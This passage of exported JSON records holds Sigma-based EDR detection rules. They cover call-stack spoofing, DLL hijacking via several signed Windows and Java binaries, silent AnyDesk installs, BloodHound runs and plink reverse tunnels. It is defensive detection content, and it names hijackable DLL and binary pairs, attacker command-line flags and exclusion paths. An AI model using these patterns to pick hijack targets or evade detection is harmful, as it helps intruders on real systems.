- 'kernel32.dll'\n - 'ntdll.dll'\n StackTrace|contains:\n - 'CorperfmonExt.dll+0xc669'\n - 'CorperfmonExt.dll+0xc71b'\n - 'CorperfmonExt.dll+0x2fde'\n\n selection_sysmain_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'sysmain.dll'\n - 'svchost.exe'\n - 'sechost.dll'\n StackTrace|contains:\n - 'sysmain.dll+0x80e5f'\n - 'sysmain.dll+0x60ce6'\n - 'sysmain.dll+0x2a7d3'\n\n selection_rpc_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'lsm.dll'\n - 'RPCRT4.dll'\n StackTrace|contains:\n - 'RPCRT4.dll+0x79633'\n - 'RPCRT4.dll+0x13711'\n - 'RPCRT4.dll+0xdd77b'\n - 'lsm.dll+0xe959'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b144a6e6-ed47-40a0-a45b-6a1928f2c29d",
"rule_name": "Spoofed Thread Call Stack Related to VulcanRaven",
"rule_description": "Detects arbitrary call stacks related to the VulcanRaven PoC.\nVulcanRaven employs call stack spoofing techniques to evade detection by EDR solutions, it manipulates thread call stacks to appear as legitimate Windows system operations, making malicious activities blend in with normal system behavior.\nAttackers may try to bypass EDR behavioral detection by forging call stacks that mimic trusted system processes and libraries, thereby evading stack-based heuristics and memory analysis.\nIt is recommended to investigate the source process, validate the legitimacy of the call chain, examine memory for inconsistencies, and correlate with other suspicious activities from the same process or parent process.\n",
"rule_creation_date": "2025-08-25",
"rule_modified_date": "2025-11-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b150c8ae-7c90-484f-895b-8905784895c8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601382Z",
"creation_date": "2026-03-23T11:45:34.601386Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601393Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SBousseaden/status/1558916870937395200?t=0_vqv6hJ0-dyKJJTSdSATw&s=19",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_javacpl.yml",
"content": "title: DLL Hijacking via javacpl.exe\nid: b150c8ae-7c90-484f-895b-8905784895c8\ndescription: |\n Detects potential Windows DLL Hijacking via javacpl.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying the legitimate javacpl executable alongside a malicious msvcr100.dll.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/SBousseaden/status/1558916870937395200?t=0_vqv6hJ0-dyKJJTSdSATw&s=19\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'javacpl.exe'\n ProcessSignature: 'Oracle America, Inc.'\n ImageLoaded|endswith:\n - '\\msvcr100.dll'\n - '\\msvcr100_clr0400.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Company: 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b150c8ae-7c90-484f-895b-8905784895c8",
"rule_name": "DLL Hijacking via javacpl.exe",
"rule_description": "Detects potential Windows DLL Hijacking via javacpl.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying the legitimate javacpl executable alongside a malicious msvcr100.dll.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-22",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b167c502-a7cd-4785-8c74-8a3947de4a7f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081980Z",
"creation_date": "2026-03-23T11:45:34.081982Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081986Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msimerg.yml",
"content": "title: DLL Hijacking via MsiMerg.exe\nid: b167c502-a7cd-4785-8c74-8a3947de4a7f\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiMerg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiMerg.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b167c502-a7cd-4785-8c74-8a3947de4a7f",
"rule_name": "DLL Hijacking via MsiMerg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiMerg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b1782bf1-6bfb-4197-a276-32e83634bc02",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081763Z",
"creation_date": "2026-03-23T11:45:34.081765Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081769Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msifiler.yml",
"content": "title: DLL Hijacking via MsiFiler.exe\nid: b1782bf1-6bfb-4197-a276-32e83634bc02\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiFiler.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiFiler.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b1782bf1-6bfb-4197-a276-32e83634bc02",
"rule_name": "DLL Hijacking via MsiFiler.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiFiler.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b1800ae4-33f9-442e-b207-30f8f0d1f199",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622704Z",
"creation_date": "2026-03-23T11:45:34.622706Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622710Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/03/07/2021-year-in-review/",
"https://twitter.com/TheDFIRReport/status/1498672358843953152",
"https://support.anydesk.com/knowledge/command-line-interface-for-windows",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_suspicious_anydesk.yml",
"content": "title: Suspicious AnyDesk Execution\nid: b1800ae4-33f9-442e-b207-30f8f0d1f199\ndescription: |\n Detects a suspicious execution of AnyDesk.\n AnyDesk is a remote desktop software that allows users to access and control computers remotely.\n This tool is frequently used by ransomware groups to gain remote access on system.\n It is recommended to verify if the usage of this tool is legitimate and to look for potential malicious actions.\nreferences:\n - https://thedfirreport.com/2022/03/07/2021-year-in-review/\n - https://twitter.com/TheDFIRReport/status/1498672358843953152\n - https://support.anydesk.com/knowledge/command-line-interface-for-windows\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/03/11\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.AnyDesk\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\AnyDesk.exe'\n - Product: 'AnyDesk'\n - Description: 'AnyDesk'\n - Company: 'AnyDesk Software GmbH'\n\n selection_cmd1:\n CommandLine|contains|all:\n - '--install'\n - '--start-with-win'\n - '--silent'\n\n selection_cmd2:\n CommandLine|contains:\n - '--set-password'\n - '--get-id'\n\n filter_options1:\n CommandLine|contains: ' --create-shortcuts'\n filter_options2:\n CommandLine|contains:\n - ' --update-manually'\n - ' --update-auto'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_atera:\n CommandLine: 'AnyDesk-????????_msi.exe --set-password'\n GrandparentImage:\n - '?:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageADRemote\\AgentPackageADRemote.exe'\n - '?:\\Program Files (x86)\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageADRemote\\AgentPackageADRemote.exe'\n - '?:\\Program Files\\ATERA Networks\\AteraAgent\\Agent\\packages\\AgentPackageADRemote\\AgentPackageADRemote.exe'\n\n exclusion_insaneremote:\n CommandLine: '.\\InsaneRemote.exe --install ?:\\Program Files\\InsaneRMMAnydesk --remove-first --start-with-win --silent'\n ParentCommandLine: '?:\\Program Files\\InsaneRMM\\InsaneRMM.exe install'\n\n exclusion_wapt:\n ProcessAncestors|contains: '|?:\\Program Files (x86)\\wapt\\wapt-get.exe|?:\\Program Files (x86)\\wapt\\waptservice.exe|'\n\n condition: selection and 1 of selection_cmd* and not all of filter_options* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b1800ae4-33f9-442e-b207-30f8f0d1f199",
"rule_name": "Suspicious AnyDesk Execution",
"rule_description": "Detects a suspicious execution of AnyDesk.\nAnyDesk is a remote desktop software that allows users to access and control computers remotely.\nThis tool is frequently used by ransomware groups to gain remote access on system.\nIt is recommended to verify if the usage of this tool is legitimate and to look for potential malicious actions.\n",
"rule_creation_date": "2022-03-11",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b1a129c6-4b0d-427c-836e-56db8d8b4f7e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605323Z",
"creation_date": "2026-03-23T11:45:34.605327Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605334Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BloodHoundAD/BloodHound",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/software/S0521/"
],
"name": "t1018_bloodhound_execution.yml",
"content": "title: BloodHound Execution\nid: b1a129c6-4b0d-427c-836e-56db8d8b4f7e\ndescription: |\n Detects BloodHound, an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.\n Attackers can use BloodHound to find vulnerabilities in the configuration of an Active Directory environment allowing them to perform privilege escalation.\n It is recommended to analyze the execution context of this process to establish whether this execution is legitimate for audit reasons or the consequence of an ongoing attack.\nreferences:\n - https://github.com/BloodHoundAD/BloodHound\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/software/S0521/\ndate: 2023/11/30\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1087.002\n - attack.t1482\n - attack.t1069.001\n - attack.t1069.002\n - attack.t1018\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.BloodHound\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - OriginalFileName: 'BloodHound.exe'\n - Product: 'BloodHound'\n - Image|endswith: '\\BloodHound.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b1a129c6-4b0d-427c-836e-56db8d8b4f7e",
"rule_name": "BloodHound Execution",
"rule_description": "Detects BloodHound, an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.\nAttackers can use BloodHound to find vulnerabilities in the configuration of an Active Directory environment allowing them to perform privilege escalation.\nIt is recommended to analyze the execution context of this process to establish whether this execution is legitimate for audit reasons or the consequence of an ongoing attack.\n",
"rule_creation_date": "2023-11-30",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1087.001",
"attack.t1087.002",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b1b34eb2-c730-495c-aef2-d59f6f12ed53",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624516Z",
"creation_date": "2026-03-23T11:45:34.624518Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624523Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/",
"https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1021/001/"
],
"name": "t1021_001_suspicious_process_plink.yml",
"content": "title: Suspicious plink.exe Execution\nid: b1b34eb2-c730-495c-aef2-d59f6f12ed53\ndescription: |\n Detects the suspicious execution of plink.exe to create a tunnel via the forward of a remote port to local address.\n Attackers use this technique for lateral movement or bypass network restrictions.\n It is recommended to analyze the parent process for suspicious activities and to determine if the executed binary is legitimate.\nreferences:\n - https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/\n - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2022/04/14\nmodified: 2025/12/05\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1572\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Plink\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\plink.exe'\n - OriginalFileName: 'Plink'\n selection_commandline:\n CommandLine|contains: ' -R '\n\n exclusion_ansys:\n ParentImage|endswith:\n - '\\AnsysWBU.exe'\n - '\\AnsysFWW.exe'\n CommandLine|contains|all:\n - 'plink.exe -batch -i'\n - ' qsub -'\n - ' -s /bin/sh -v -r y -n '\n\n exclusion_command:\n CommandLine|contains:\n - ' chown -R '\n - 'shutdown -r now'\n - ' rm -r '\n - ' grep -R '\n\n exclusion_tihelp:\n ProcessParentOriginalFileName: 'tishelp.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'TRANQUIL I.T. SYSTEMS'\n\n exclusion_monnaie_services:\n ProcessCommandLine|contains|all:\n - ':127.0.0.1:80'\n - '.monnaie-services.com > ?:\\EMSCine\\Prog\\pid\\tunnels\\rssh*.out 2>&1'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b1b34eb2-c730-495c-aef2-d59f6f12ed53",
"rule_name": "Suspicious plink.exe Execution",
"rule_description": "Detects the suspicious execution of plink.exe to create a tunnel via the forward of a remote port to local address.\nAttackers use this technique for lateral movement or bypass network restrictions.\nIt is recommended to analyze the parent process for suspicious activities and to determine if the executed binary is legitimate.\n",
"rule_creation_date": "2022-04-14",
"rule_modified_date": "2025-12-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b1e3ba61-78ff-46ac-b389-cf26f24dc4d1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098564Z",
"creation_date": "2026-03-23T11:45:34.098566Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098570Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systempropertiesprotection.yml",
"content": "title: DLL Hijacking via systempropertiesprotection.exe\nid: b1e3ba61-78ff-46ac-b389-cf26f24dc4d1\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertiesprotection.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertiesprotection.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b1e3ba61-78ff-46ac-b389-cf26f24dc4d1",
"rule_name": "DLL Hijacking via systempropertiesprotection.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systempropertiesprotection.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
